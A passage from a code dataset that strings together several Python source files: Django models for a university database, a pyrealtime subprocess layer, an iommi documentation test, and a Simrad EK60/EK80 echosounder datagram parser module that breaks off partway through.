FacultyHasPerson(models.Model):\n faculty = models.ForeignKey(Faculty, models.DO_NOTHING)\n person = models.ForeignKey('Person', on_delete=models.CASCADE)\n\n class Meta:\n managed = False\n db_table = 'faculty_has_person'\n\n\nclass Person(models.Model):\n person_id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=20)\n surname = models.CharField(max_length=20)\n birthdate = models.DateField()\n email = models.CharField(max_length=50)\n passwd = models.CharField(max_length=255)\n additional_note = models.CharField(max_length=255, blank=True, null=True)\n\n class Meta:\n managed = False\n db_table = 'person'\n\n def getId(self):\n return self.person_id\n\n def getName(self):\n return self.name\n\n def getSurname(self):\n return self.surname\n\n def getBirthdate(self):\n return self.birthdate\n\n def getEmail(self):\n return self.email\n\n def getPasswd(self):\n return self.passwd\n \n def getNote(self):\n return self.additional_note\n\n\nclass PersonHasAddress(models.Model):\n person = models.ForeignKey(Person, on_delete=models.CASCADE)\n address = models.ForeignKey(Address, models.DO_NOTHING)\n address_type = models.CharField(max_length=50, blank=True, null=True)\n\n class Meta:\n managed = False\n db_table = 'person_has_address'\n\n\nclass PersonHasRole(models.Model):\n person = models.ForeignKey(Person, on_delete=models.CASCADE)\n role = models.ForeignKey('Role', models.DO_NOTHING)\n\n class Meta:\n managed = False\n db_table = 'person_has_role'\n \n def __str__(self):\n return f\"{self.person} {self.role}\"\n\n\nclass PersonHasSubject(models.Model):\n person = models.ForeignKey(Person, on_delete=models.CASCADE)\n subject = models.ForeignKey('Subject', models.DO_NOTHING)\n\n class Meta:\n managed = False\n db_table = 
'person_has_subject'\n\n\nclass ProgramHasPerson(models.Model):\n program = models.ForeignKey('StudyProgram', models.DO_NOTHING)\n person = models.ForeignKey(Person, on_delete=models.CASCADE)\n\n class Meta:\n managed = False\n db_table = 'program_has_person'\n\n\nclass ProgramHasSubject(models.Model):\n program = models.ForeignKey('StudyProgram', models.DO_NOTHING)\n subject = models.ForeignKey('Subject', models.DO_NOTHING)\n\n class Meta:\n managed = False\n db_table = 'program_has_subject'\n\n\nclass Role(models.Model):\n role_id = models.AutoField(primary_key=True)\n role_type = models.CharField(max_length=20)\n\n class Meta:\n managed = False\n db_table = 'role'\n\n def __str__(self):\n return self.role_type\n\n def getAll():\n return [str(qSet.role_type) for qSet in Role.objects.all()]\n\n\nclass StudyProgram(models.Model):\n program_id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=50)\n description = models.CharField(max_length=255, blank=True, null=True)\n\n class Meta:\n managed = False\n db_table = 'study_program'\n\n def getAll():\n return [str(qSet.name) for qSet in StudyProgram.objects.all()]\n\nclass Subject(models.Model):\n subject_id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=50)\n department = models.ForeignKey(Department, models.DO_NOTHING)\n description = models.CharField(max_length=255, blank=True, null=True)\n prerequisites = models.CharField(max_length=255, blank=True, null=True)\n semester = models.SmallIntegerField()\n review = models.SmallIntegerField(blank=True, null=True)\n additional_info = models.CharField(max_length=255, blank=True, null=True)\n\n class Meta:\n managed = False\n db_table = 'subject'\n\n def getAll():\n return [str(qSet.name) for qSet in Subject.objects.all()]\n\n\nclass Thesis(models.Model):\n thesis_id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n thesis_type = models.CharField(max_length=20)\n description = models.CharField(max_length=255, blank=True, null=True)\n person = models.ForeignKey(Person, on_delete=models.CASCADE)\n\n class Meta:\n managed = False\n db_table = 'thesis'\n\n def __str__(self):\n return self.name\n"} {"ext": "py", "sha": "1a3019cdaf96ced50b6083be38769453051442c7", "content": "from threading import Thread\n\nimport pyrealtime as prt\n\n\nclass SubprocessLayer(prt.TransformMixin, prt.ThreadLayer):\n def __init__(self, port_in, cmd, *args, encoder=None, decoder=None, **kwargs):\n super().__init__(port_in, *args, **kwargs)\n self.cmd = cmd\n self.proc = None\n self.read_thread = None\n self._encode = encoder if encoder is not None else self.encode\n self._decode = decoder if decoder is not None else self.decode\n\n def encode(self, data):\n return data + \"\\n\"\n\n def decode(self, data):\n return data.rstrip().decode('utf-8')\n\n def initialize(self):\n try:\n import pexpect.popen_spawn\n except ImportError:\n raise ModuleNotFoundError(\"pexpect required to use subprocess layers\")\n self.proc = pexpect.popen_spawn.PopenSpawn(self.cmd)\n self.read_thread = Thread(target=self.read_loop)\n self.read_thread.start()\n\n def read_loop(self):\n import pexpect\n while True:\n try:\n index = self.proc.expect(\".*\\n\")\n data = self.proc.match[index]\n self.handle_output(self._decode(data))\n except pexpect.exceptions.EOF:\n print(\"end of file\")\n return prt.LayerSignal.STOP\n\n def transform(self, data):\n self.proc.write(self._encode(data))\n return None\n"} {"ext": "py", "sha": "1a301a820e688d7a6e23162424700f051e650e8e", 
"content": "from tests.helpers import req\n\nrequest = req('get')\n\n\ndef test_extra_and_extra_evaluated():\n # language=rst\n \"\"\"\n extra and extra_evaluated\n =========================\n\n Very often it's useful to add some little bit of data on the side that you need\n later to customize something. We think it's important to support this use case\n with minimal amounts of code. To do this we have `extra` and `extra_evaluated`.\n This is your place to put whatever you want in order to extend iommi for a general\n feature or just some simple one-off customization for a single view.\n\n All `Part` derived classes have `extra` and `extra_evaluated` namespaces, for example:\n `Page`, `Column`, `Table`, `Field`, `Form`, and `Action`.\n\n You use `extra` to put some data you want as-is:\n\n .. code-block::\n\n form = Form.create(\n auto__model=Artist\n fields__name__extra__sounds_cool=True,\n extra__is_cool=True,\n )\n\n Here we add `sounds_cool` to the `name` field, and the `is_cool` value to the\n entire `Form`. We can then access these in e.g. a template:\n `{{ form.fields.name.extra.sounds_cool }}` and `{{ form.extra.is_cool }}`.\n\n `extra_evaluated` is useful when you want to use the iommi evalaution\n machinery to get some dynamic behavior:\n\n\n .. code-block::\n\n form = Form.create(\n auto__model=Artist\n fields__name__extra_evaluated__sounds_cool=lambda request, **_: request.is_staff,\n extra_evaluated__is_cool=lambda request, **_: request.is_staff,\n )\n\n These are accessed like this in the template: `{{ form.fields.name.extra_evaluated.sounds_cool }}`.\n \"\"\"\n"} {"ext": "py", "sha": "1a301d3f2eba522abf77c252be8a0724dae60b86", "content": "\"\"\"\nCode originally developed for pyEcholab\n(https://github.com/CI-CMG/pyEcholab)\nby Rick Towler at NOAA AFSC.\n\nThe code has been modified to handle split-beam data and\nchannel-transducer structure from different EK80 setups.\n\"\"\"\n\nimport logging\nimport re\nimport struct\nimport sys\nimport xml.etree.ElementTree as ET\nfrom collections import Counter\n\nimport numpy as np\n\nfrom .ek_date_conversion import nt_to_unix\n\nTCVR_CH_NUM_MATCHER = re.compile(r\"\\d{6}-\\w{1,2}|\\w{12}-\\w{1,2}\")\n\n__all__ = [\n \"SimradNMEAParser\",\n \"SimradDepthParser\",\n \"SimradBottomParser\",\n \"SimradAnnotationParser\",\n \"SimradConfigParser\",\n \"SimradRawParser\",\n]\n\nlog = logging.getLogger(__name__)\n\n\nclass _SimradDatagramParser(object):\n \"\"\"\"\"\"\n\n def __init__(self, header_type, header_formats):\n self._id = header_type\n self._headers = header_formats\n self._versions = list(header_formats.keys())\n\n def header_fmt(self, version=0):\n return \"=\" + \"\".join([x[1] for x in self._headers[version]])\n\n def header_size(self, version=0):\n return struct.calcsize(self.header_fmt(version))\n\n def header_fields(self, version=0):\n return [x[0] for x in self._headers[version]]\n\n def header(self, version=0):\n return self._headers[version][:]\n\n def validate_data_header(self, data):\n\n if isinstance(data, dict):\n type_ = data[\"type\"][:3]\n version = int(data[\"type\"][3])\n\n elif isinstance(data, str):\n type_ = data[:3]\n version = int(data[3])\n\n else:\n raise TypeError(\"Expected a dict or str\")\n\n if type_ != self._id:\n raise ValueError(\"Expected data of type %s, not %s\" % (self._id, type_))\n\n if version not in self._versions:\n raise ValueError(\n \"No parser available for type %s version %d\" % (self._id, version)\n )\n\n return type_, version\n\n def from_string(self, raw_string, bytes_read):\n\n 
header = raw_string[:4]\n if sys.version_info.major > 2:\n header = header.decode()\n id_, version = self.validate_data_header(header)\n return self._unpack_contents(raw_string, bytes_read, version=version)\n\n def to_string(self, data={}):\n\n id_, version = self.validate_data_header(data)\n datagram_content_str = self._pack_contents(data, version=version)\n return self.finalize_datagram(datagram_content_str)\n\n def _unpack_contents(self, raw_string=\"\", version=0):\n raise NotImplementedError\n\n def _pack_contents(self, data={}, version=0):\n raise NotImplementedError\n\n @classmethod\n def finalize_datagram(cls, datagram_content_str):\n datagram_size = len(datagram_content_str)\n final_fmt = \"=l%dsl\" % (datagram_size)\n return struct.pack(\n final_fmt, datagram_size, datagram_content_str, datagram_size\n )\n\n\nclass SimradDepthParser(_SimradDatagramParser):\n \"\"\"\n ER60 Depth Detection datagram (from .bot files) contain the following keys:\n\n type: string == 'DEP0'\n low_date: long uint representing LSBytes of 64bit NT date\n high_date: long uint representing MSBytes of 64bit NT date\n timestamp: datetime.datetime object of NT date, assumed to be UTC\n transceiver_count: [long uint] with number of tranceivers\n\n depth: [float], one value for each active channel\n reflectivity: [float], one value for each active channel\n unused: [float], unused value for each active channel\n\n The following methods are defined:\n\n from_string(str): parse a raw ER60 Depth datagram\n (with leading/trailing datagram size stripped)\n\n to_string(): Returns the datagram as a raw string\n (including leading/trailing size fields)\n ready for writing to disk\n\n \"\"\"\n\n def __init__(self):\n headers = {\n 0: [\n (\"type\", \"4s\"),\n (\"low_date\", \"L\"),\n (\"high_date\", \"L\"),\n (\"transceiver_count\", \"L\"),\n ]\n }\n _SimradDatagramParser.__init__(self, \"DEP\", headers)\n\n def _unpack_contents(self, raw_string, bytes_read, version):\n \"\"\"\"\"\"\n\n header_values = struct.unpack(\n self.header_fmt(version), raw_string[: self.header_size(version)]\n )\n data = {}\n\n for indx, field in enumerate(self.header_fields(version)):\n data[field] = header_values[indx]\n if isinstance(data[field], bytes):\n data[field] = data[field].decode()\n\n data[\"timestamp\"] = nt_to_unix((data[\"low_date\"], data[\"high_date\"]))\n data[\"bytes_read\"] = bytes_read\n\n if version == 0:\n data_fmt = \"=3f\"\n data_size = struct.calcsize(data_fmt)\n\n data[\"depth\"] = np.zeros((data[\"transceiver_count\"],))\n data[\"reflectivity\"] = np.zeros((data[\"transceiver_count\"],))\n data[\"unused\"] = np.zeros((data[\"transceiver_count\"],))\n\n buf_indx = self.header_size(version)\n for indx in range(data[\"transceiver_count\"]):\n d, r, u = struct.unpack(\n data_fmt, raw_string[buf_indx : buf_indx + data_size] # noqa\n )\n data[\"depth\"][indx] = d\n data[\"reflectivity\"][indx] = r\n data[\"unused\"][indx] = u\n\n buf_indx += data_size\n\n return data\n\n def _pack_contents(self, data, version):\n\n datagram_fmt = self.header_fmt(version)\n datagram_contents = []\n\n if version == 0:\n\n lengths = [\n len(data[\"depth\"]),\n len(data[\"reflectivity\"]),\n len(data[\"unused\"]),\n data[\"transceiver_count\"],\n ]\n\n if len(set(lengths)) != 1:\n min_indx = min(lengths)\n log.warning(\n \"Data lengths mismatched: d:%d, r:%d, u:%d, t:%d\", *lengths\n )\n log.warning(\" Using minimum value: %d\", min_indx)\n data[\"transceiver_count\"] = min_indx\n\n else:\n min_indx = data[\"transceiver_count\"]\n\n for field 
in self.header_fields(version):\n datagram_contents.append(data[field])\n\n datagram_fmt += \"%df\" % (3 * data[\"transceiver_count\"])\n\n for indx in range(data[\"transceiver_count\"]):\n datagram_contents.extend(\n [\n data[\"depth\"][indx],\n data[\"reflectivity\"][indx],\n data[\"unused\"][indx],\n ]\n )\n\n return struct.pack(datagram_fmt, *datagram_contents)\n\n\nclass SimradBottomParser(_SimradDatagramParser):\n \"\"\"\n Bottom Detection datagram contains the following keys:\n\n type: string == 'BOT0'\n low_date: long uint representing LSBytes of 64bit NT date\n high_date: long uint representing MSBytes of 64bit NT date\n datetime: datetime.datetime object of NT date converted to UTC\n transceiver_count: long uint with number of tranceivers\n depth: [float], one value for each active channel\n\n The following methods are defined:\n\n from_string(str): parse a raw ER60 Bottom datagram\n (with leading/trailing datagram size stripped)\n\n to_string(): Returns the datagram as a raw string\n (including leading/trailing size fields)\n ready for writing to disk\n \"\"\"\n\n def __init__(self):\n headers = {\n 0: [\n (\"type\", \"4s\"),\n (\"low_date\", \"L\"),\n (\"high_date\", \"L\"),\n (\"transceiver_count\", \"L\"),\n ]\n }\n _SimradDatagramParser.__init__(self, \"BOT\", headers)\n\n def _unpack_contents(self, raw_string, bytes_read, version):\n \"\"\"\"\"\"\n\n header_values = struct.unpack(\n self.header_fmt(version), raw_string[: self.header_size(version)]\n )\n data = {}\n\n for indx, field in enumerate(self.header_fields(version)):\n data[field] = header_values[indx]\n if isinstance(data[field], bytes):\n data[field] = data[field].decode()\n\n data[\"timestamp\"] = nt_to_unix((data[\"low_date\"], data[\"high_date\"]))\n data[\"bytes_read\"] = bytes_read\n\n if version == 0:\n depth_fmt = \"=%dd\" % (data[\"transceiver_count\"],)\n depth_size = struct.calcsize(depth_fmt)\n buf_indx = self.header_size(version)\n data[\"depth\"] = np.fromiter(\n struct.unpack(\n depth_fmt, raw_string[buf_indx : buf_indx + depth_size]\n ), # noqa\n \"float\",\n )\n\n return data\n\n def _pack_contents(self, data, version):\n\n datagram_fmt = self.header_fmt(version)\n datagram_contents = []\n\n if version == 0:\n\n if len(data[\"depth\"]) != data[\"transceiver_count\"]:\n log.warning(\n \"# of depth values %d does not match transceiver count %d\",\n len(data[\"depth\"]),\n data[\"transceiver_count\"],\n )\n\n data[\"transceiver_count\"] = len(data[\"depth\"])\n\n for field in self.header_fields(version):\n datagram_contents.append(data[field])\n\n datagram_fmt += \"%dd\" % (data[\"transceiver_count\"])\n datagram_contents.extend(data[\"depth\"])\n\n return struct.pack(datagram_fmt, *datagram_contents)\n\n\nclass SimradAnnotationParser(_SimradDatagramParser):\n \"\"\"\n ER60 Annotation datagram contains the following keys:\n\n\n type: string == 'TAG0'\n low_date: long uint representing LSBytes of 64bit NT date\n high_date: long uint representing MSBytes of 64bit NT date\n timestamp: datetime.datetime object of NT date, assumed to be UTC\n\n text: Annotation\n\n The following methods are defined:\n\n from_string(str): parse a raw ER60 Annotation datagram\n (with leading/trailing datagram size stripped)\n\n to_string(): Returns the datagram as a raw string\n (including leading/trailing size fields)\n ready for writing to disk\n \"\"\"\n\n def __init__(self):\n headers = {0: [(\"type\", \"4s\"), (\"low_date\", \"L\"), (\"high_date\", \"L\")]}\n\n _SimradDatagramParser.__init__(self, \"TAG\", headers)\n\n 
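    # Editor's note (illustrative only): on packing, the annotation text is
    # null-terminated and padded to a 4-byte boundary before finalize_datagram()
    # frames the payload with leading/trailing size fields ("=l%dsl").
    # A hypothetical sketch of that padding step (example string made up):
    #
    #     text = "survey start\x00"
    #     if len(text) % 4:
    #         text += "\x00" * (4 - (len(text) % 4))  # pad to 4-byte boundary
    #
    # The real logic lives in _pack_contents() below.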
def _unpack_contents(self, raw_string, bytes_read, version):\n \"\"\"\"\"\"\n\n header_values = struct.unpack(\n self.header_fmt(version), raw_string[: self.header_size(version)]\n )\n data = {}\n\n for indx, field in enumerate(self.header_fields(version)):\n data[field] = header_values[indx]\n if isinstance(data[field], bytes):\n data[field] = data[field].decode()\n\n data[\"timestamp\"] = nt_to_unix((data[\"low_date\"], data[\"high_date\"]))\n data[\"bytes_read\"] = bytes_read\n\n # if version == 0:\n # data['text'] = raw_string[self.header_size(version):].strip('\\x00')\n # if isinstance(data['text'], bytes):\n # data['text'] = data['text'].decode()\n\n if version == 0:\n if sys.version_info.major > 2:\n data[\"text\"] = str(\n raw_string[self.header_size(version) :].strip(b\"\\x00\"),\n \"ascii\",\n errors=\"replace\",\n )\n else:\n data[\"text\"] = unicode( # noqa\n raw_string[self.header_size(version) :].strip(\"\\x00\"),\n \"ascii\",\n errors=\"replace\",\n )\n\n return data\n\n def _pack_contents(self, data, version):\n\n datagram_fmt = self.header_fmt(version)\n datagram_contents = []\n\n if version == 0:\n\n for field in self.header_fields(version):\n datagram_contents.append(data[field])\n\n if data[\"text\"][-1] != \"\\x00\":\n tmp_string = data[\"text\"] + \"\\x00\"\n else:\n tmp_string = data[\"text\"]\n\n # Pad with more nulls to 4-byte word boundry if necessary\n if len(tmp_string) % 4:\n tmp_string += \"\\x00\" * (4 - (len(tmp_string) % 4))\n\n datagram_fmt += \"%ds\" % (len(tmp_string))\n datagram_contents.append(tmp_string)\n\n return struct.pack(datagram_fmt, *datagram_contents)\n\n\nclass SimradNMEAParser(_SimradDatagramParser):\n \"\"\"\n ER60 NMEA datagram contains the following keys:\n\n\n type: string == 'NME0'\n low_date: long uint representing LSBytes of 64bit NT date\n high_date: long uint representing MSBytes of 64bit NT date\n timestamp: datetime.datetime object of NT date, assumed to be UTC\n\n nmea_string: full (original) NMEA string\n\n The following methods are defined:\n\n from_string(str): parse a raw ER60 NMEA datagram\n (with leading/trailing datagram size stripped)\n\n to_string(): Returns the datagram as a raw string\n (including leading/trailing size fields)\n ready for writing to disk\n \"\"\"\n\n nmea_head_re = re.compile(r\"\\$[A-Za-z]{5},\") # noqa\n\n def __init__(self):\n headers = {\n 0: [(\"type\", \"4s\"), (\"low_date\", \"L\"), (\"high_date\", \"L\")],\n 1: [(\"type\", \"4s\"), (\"low_date\", \"L\"), (\"high_date\", \"L\"), (\"port\", \"32s\")],\n }\n\n _SimradDatagramParser.__init__(self, \"NME\", headers)\n\n def _unpack_contents(self, raw_string, bytes_read, version):\n \"\"\"\n Parses the NMEA string provided in raw_string\n\n :param raw_string: Raw NMEA strin (i.e. 
'$GPZDA,160012.71,11,03,2004,-1,00*7D')\n :type raw_string: str\n\n :returns: None\n \"\"\"\n\n header_values = struct.unpack(\n self.header_fmt(version), raw_string[: self.header_size(version)]\n )\n data = {}\n\n for indx, field in enumerate(self.header_fields(version)):\n data[field] = header_values[indx]\n if isinstance(data[field], bytes):\n data[field] = data[field].decode()\n\n data[\"timestamp\"] = nt_to_unix((data[\"low_date\"], data[\"high_date\"]))\n data[\"bytes_read\"] = bytes_read\n\n # Remove trailing \\x00 from the PORT field for NME1, rest of the datagram identical to NME0\n if version == 1:\n data[\"port\"] = data[\"port\"].strip(\"\\x00\")\n\n if version == 0 or version == 1:\n if sys.version_info.major > 2:\n data[\"nmea_string\"] = str(\n raw_string[self.header_size(version) :].strip(b\"\\x00\"),\n \"ascii\",\n errors=\"replace\",\n )\n else:\n data[\"nmea_string\"] = unicode( # noqa\n raw_string[self.header_size(version) :].strip(\"\\x00\"),\n \"ascii\",\n errors=\"replace\",\n )\n\n if self.nmea_head_re.match(data[\"nmea_string\"][:7]) is not None:\n data[\"nmea_talker\"] = data[\"nmea_string\"][1:3]\n data[\"nmea_type\"] = data[\"nmea_string\"][3:6]\n else:\n data[\"nmea_talker\"] = \"\"\n data[\"nmea_type\"] = \"UNKNOWN\"\n\n return data\n\n def _pack_contents(self, data, version):\n\n datagram_fmt = self.header_fmt(version)\n datagram_contents = []\n\n if version == 0:\n\n for field in self.header_fields(version):\n datagram_contents.append(data[field])\n\n if data[\"nmea_string\"][-1] != \"\\x00\":\n tmp_string = data[\"nmea_string\"] + \"\\x00\"\n else:\n tmp_string = data[\"nmea_string\"]\n\n # Pad with more nulls to 4-byte word boundry if necessary\n if len(tmp_string) % 4:\n tmp_string += \"\\x00\" * (4 - (len(tmp_string) % 4))\n\n datagram_fmt += \"%ds\" % (len(tmp_string))\n\n # Convert to python string if needed\n if isinstance(tmp_string, str):\n tmp_string = tmp_string.encode(\"ascii\", errors=\"replace\")\n\n datagram_contents.append(tmp_string)\n\n return struct.pack(datagram_fmt, *datagram_contents)\n\n\nclass SimradMRUParser(_SimradDatagramParser):\n \"\"\"\n EK80 MRU datagram contains the following keys:\n\n\n type: string == 'MRU0'\n low_date: long uint representing LSBytes of 64bit NT date\n high_date: long uint representing MSBytes of 64bit NT date\n timestamp: datetime.datetime object of NT date, assumed to be UTC\n heave: float\n roll : float\n pitch: float\n heading: float\n\n The following methods are defined:\n\n from_string(str): parse a raw ER60 NMEA datagram\n (with leading/trailing datagram size stripped)\n\n to_string(): Returns the datagram as a raw string\n (including leading/trailing size fields)\n ready for writing to disk\n \"\"\"\n\n def __init__(self):\n headers = {\n 0: [\n (\"type\", \"4s\"),\n (\"low_date\", \"L\"),\n (\"high_date\", \"L\"),\n (\"heave\", \"f\"),\n (\"roll\", \"f\"),\n (\"pitch\", \"f\"),\n (\"heading\", \"f\"),\n ]\n }\n\n _SimradDatagramParser.__init__(self, \"MRU\", headers)\n\n def _unpack_contents(self, raw_string, bytes_read, version):\n \"\"\"\n Unpacks the data in raw_string into dictionary containing MRU data\n\n :param raw_string:\n :type raw_string: str\n\n :returns: None\n \"\"\"\n\n header_values = struct.unpack(\n self.header_fmt(version), raw_string[: self.header_size(version)]\n )\n data = {}\n\n for indx, field in enumerate(self.header_fields(version)):\n data[field] = header_values[indx]\n if isinstance(data[field], bytes):\n data[field] = data[field].decode()\n\n data[\"timestamp\"] = 
nt_to_unix((data[\"low_date\"], data[\"high_date\"]))\n data[\"bytes_read\"] = bytes_read\n\n return data\n\n def _pack_contents(self, data, version):\n\n datagram_fmt = self.header_fmt(version)\n datagram_contents = []\n\n if version == 0:\n\n for field in self.header_fields(version):\n datagram_contents.append(data[field])\n\n if data[\"nmea_string\"][-1] != \"\\x00\":\n tmp_string = data[\"nmea_string\"] + \"\\x00\"\n else:\n tmp_string = data[\"nmea_string\"]\n\n # Pad with more nulls to 4-byte word boundry if necessary\n if len(tmp_string) % 4:\n tmp_string += \"\\x00\" * (4 - (len(tmp_string) % 4))\n\n datagram_fmt += \"%ds\" % (len(tmp_string))\n\n # Convert to python string if needed\n if isinstance(tmp_string, str):\n tmp_string = tmp_string.encode(\"ascii\", errors=\"replace\")\n\n datagram_contents.append(tmp_string)\n\n return struct.pack(datagram_fmt, *datagram_contents)\n\n\nclass SimradXMLParser(_SimradDatagramParser):\n \"\"\"\n EK80 XML datagram contains the following keys:\n\n\n type: string == 'XML0'\n low_date: long uint representing LSBytes of 64bit NT date\n high_date: long uint representing MSBytes of 64bit NT date\n timestamp: datetime.datetime object of NT date, assumed to be UTC\n subtype: string representing Simrad XML datagram type:\n configuration, environment, or parameter\n\n [subtype]: dict containing the data specific to the XML subtype.\n\n The following methods are defined:\n\n from_string(str): parse a raw EK80 XML datagram\n (with leading/trailing datagram size stripped)\n\n to_string(): Returns the datagram as a raw string\n (including leading/trailing size fields)\n ready for writing to disk\n \"\"\"\n\n # define the XML parsing options - here we define dictionaries for various xml datagram\n # types. When parsing that xml datagram, these dictionaries are used to inform the parser about\n # type conversion, name wrangling, and delimiter. If a field is missing, the parser\n # assumes no conversion: type will be string, default mangling, and that there is only 1\n # element.\n #\n # the dicts are in the form:\n # 'XMLParamName':[converted type,'fieldname', 'parse char']\n #\n # For example: 'PulseDurationFM':[float,'pulse_duration_fm',';']\n #\n # will result in a return dictionary field named 'pulse_duration_fm' that contains a list\n # of float values parsed from a string that uses ';' to separate values. 
Empty strings\n # for fieldname and/or parse char result in the default action for those parsing steps.\n\n channel_parsing_options = {\n \"MaxTxPowerTransceiver\": [int, \"\", \"\"],\n \"PulseDuration\": [float, \"\", \";\"],\n \"PulseDurationFM\": [float, \"pulse_duration_fm\", \";\"],\n \"SampleInterval\": [float, \"\", \";\"],\n \"ChannelID\": [str, \"channel_id\", \"\"],\n \"HWChannelConfiguration\": [str, \"hw_channel_configuration\", \"\"],\n }\n\n transceiver_parsing_options = {\n \"TransceiverNumber\": [int, \"\", \"\"],\n \"Version\": [str, \"transceiver_version\", \"\"],\n \"IPAddress\": [str, \"ip_address\", \"\"],\n \"Impedance\": [int, \"\", \"\"],\n }\n\n transducer_parsing_options = {\n \"SerialNumber\": [str, \"transducer_serial_number\", \"\"],\n \"Frequency\": [float, \"transducer_frequency\", \"\"],\n \"FrequencyMinimum\": [float, \"transducer_frequency_minimum\", \"\"],\n \"FrequencyMaximum\": [float, \"transducer_frequency_maximum\", \"\"],\n \"BeamType\": [int, \"transducer_beam_type\", \"\"],\n \"Gain\": [float, \"\", \";\"],\n \"SaCorrection\": [float, \"\", \";\"],\n \"MaxTxPowerTransducer\": [float, \"\", \"\"],\n \"EquivalentBeamAngle\": [float, \"\", \"\"],\n \"BeamWidthAlongship\": [float, \"\", \"\"],\n \"BeamWidthAthwartship\": [float, \"\", \"\"],\n \"AngleSensitivityAlongship\": [float, \"\", \"\"],\n \"AngleSensitivityAthwartship\": [float, \"\", \"\"],\n \"AngleOffsetAlongship\": [float, \"\", \"\"],\n \"AngleOffsetAthwartship\": [float, \"\", \"\"],\n \"DirectivityDropAt2XBeamWidth\": [\n float,\n \"directivity_drop_at_2x_beam_width\",\n \"\",\n ],\n \"TransducerOffsetX\": [float, \"\", \"\"],\n \"TransducerOffsetY\": [float, \"\", \"\"],\n \"TransducerOffsetZ\": [float, \"\", \"\"],\n \"TransducerAlphaX\": [float, \"\", \"\"],\n \"TransducerAlphaY\": [float, \"\", \"\"],\n \"TransducerAlphaZ\": [float, \"\", \"\"],\n }\n\n header_parsing_options = {\"Version\": [str, \"application_version\", \"\"]}\n\n envxdcr_parsing_options = {\"SoundSpeed\": [float, \"transducer_sound_speed\", \"\"]}\n\n environment_parsing_options = {\n \"Depth\": [float, \"\", \"\"],\n \"Acidity\": [float, \"\", \"\"],\n \"Salinity\": [float, \"\", \"\"],\n \"SoundSpeed\": [float, \"\", \"\"],\n \"Temperature\": [float, \"\", \"\"],\n \"Latitude\": [float, \"\", \"\"],\n \"SoundVelocityProfile\": [float, \"\", \";\"],\n \"DropKeelOffset\": [float, \"\", \"\"],\n \"DropKeelOffsetIsManual\": [int, \"\", \"\"],\n \"WaterLevelDraft\": [float, \"\", \"\"],\n \"WaterLevelDraftIsManual\": [int, \"\", \"\"],\n }\n\n parameter_parsing_options = {\n \"ChannelID\": [str, \"channel_id\", \"\"],\n \"ChannelMode\": [int, \"\", \"\"],\n \"PulseForm\": [int, \"\", \"\"],\n \"Frequency\": [float, \"\", \"\"],\n \"PulseDuration\": [float, \"\", \"\"],\n \"SampleInterval\": [float, \"\", \"\"],\n \"TransmitPower\": [float, \"\", \"\"],\n \"Slope\": [float, \"\", \"\"],\n }\n\n def __init__(self):\n headers = {0: [(\"type\", \"4s\"), (\"low_date\", \"L\"), (\"high_date\", \"L\")]}\n _SimradDatagramParser.__init__(self, \"XML\", headers)\n\n def _unpack_contents(self, raw_string, bytes_read, version):\n \"\"\"\n Parses the NMEA string provided in raw_string\n\n :param raw_string: Raw NMEA strin (i.e. '$GPZDA,160012.71,11,03,2004,-1,00*7D')\n :type raw_string: str\n\n :returns: None\n \"\"\"\n\n def from_CamelCase(xml_param):\n \"\"\"\n convert name from CamelCase to fit with existing naming convention by\n inserting an underscore before each capital and then lowering the caps\n e.g. 
CamelCase becomes camel_case.\n \"\"\"\n idx = list(reversed([i for i, c in enumerate(xml_param) if c.isupper()]))\n param_len = len(xml_param)\n for i in idx:\n # check if we should insert an underscore\n if i > 0 and i < param_len:\n xml_param = xml_param[:i] + \"_\" + xml_param[i:]\n xml_param = xml_param.lower()\n\n return xml_param\n\n def dict_to_dict(xml_dict, data_dict, parse_opts):\n \"\"\"\n dict_to_dict appends the ETree xml value dicts to a provided dictionary\n and along the way converts the key name to conform to the project's\n naming convention and optionally parses and or converts values as\n specified in the parse_opts dictionary.\n \"\"\"\n\n for k in xml_dict:\n # check if we're parsing this key/value\n if k in parse_opts:\n # try to parse the string\n if parse_opts[k][2]:\n try:\n data = xml_dict[k].split(parse_opts[k][2])\n except:\n # bad or empty parse chararacter(s) provided\n data = xml_dict[k]\n else:\n # no parse char provided - nothing to parse\n data = xml_dict[k]\n\n # try to convert to specified type\n if isinstance(data, list):\n for i in range(len(data)):\n try:\n data[i] = parse_opts[k][0](data[i])\n except:\n pass\n else:\n data = parse_opts[k][0](data)\n\n # and add the value to the provided dict\n if parse_opts[k][1]:\n # add using the specified key name\n data_dict[parse_opts[k][1]] = data\n else:\n # add using the default key name wrangling\n data_dict[from_CamelCase(k)] = data\n else:\n # nothing to do with the value string\n data = xml_dict[k]\n\n # add the parameter to the provided dictionary\n data_dict[from_CamelCase(k)] = data\n\n header_values = struct.unpack(\n self.header_fmt(version), raw_string[: self.header_size(version)]\n )\n data = {}\n\n for indx, field in enumerate(self.header_fields(version)):\n data[field] = header_values[indx]\n if isinstance(data[field], bytes):\n data[field] = data[field].decode()\n\n data[\"timestamp\"] = nt_to_unix((data[\"low_date\"], data[\"high_date\"]))\n data[\"bytes_read\"] = bytes_read\n\n if version == 0:\n if sys.version_info.major > 2:\n xml_string = str(\n raw_string[self.header_size(version) :].strip(b\"\\x00\"),\n \"ascii\",\n errors=\"replace\",\n )\n else:\n xml_string = unicode( # noqa\n raw_string[self.header_size(version) :].strip(\"\\x00\"),\n \"ascii\",\n errors=\"replace\",\n )\n\n # get the ElementTree element\n root = ET.fromstring(xml_string)\n\n # get the XML message type\n data[\"subtype\"] = root.tag.lower()\n\n # create the dictionary that contains the message data\n data[data[\"subtype\"]] = {}\n\n # parse it\n if data[\"subtype\"] == \"configuration\":\n\n # parse the Transceiver section\n for tcvr in root.iter(\"Transceiver\"):\n # parse the Transceiver section\n tcvr_xml = tcvr.attrib\n\n # parse the Channel section -- this works with multiple channels\n # under 1 transceiver\n for tcvr_ch in tcvr.iter(\"Channel\"):\n tcvr_ch_xml = tcvr_ch.attrib\n channel_id = tcvr_ch_xml[\"ChannelID\"]\n\n # create the configuration dict for this channel\n data[\"configuration\"][channel_id] = {}\n\n # add the transceiver data to the config dict (this is\n # replicated for all channels)\n dict_to_dict(\n tcvr_xml,\n data[\"configuration\"][channel_id],\n self.transceiver_parsing_options,\n )\n\n # add the general channel data to the config dict\n dict_to_dict(\n tcvr_ch_xml,\n data[\"configuration\"][channel_id],\n self.channel_parsing_options,\n )\n\n # check if there are >1 transducer under a single transceiver channel\n if len(list(tcvr_ch)) > 1:\n 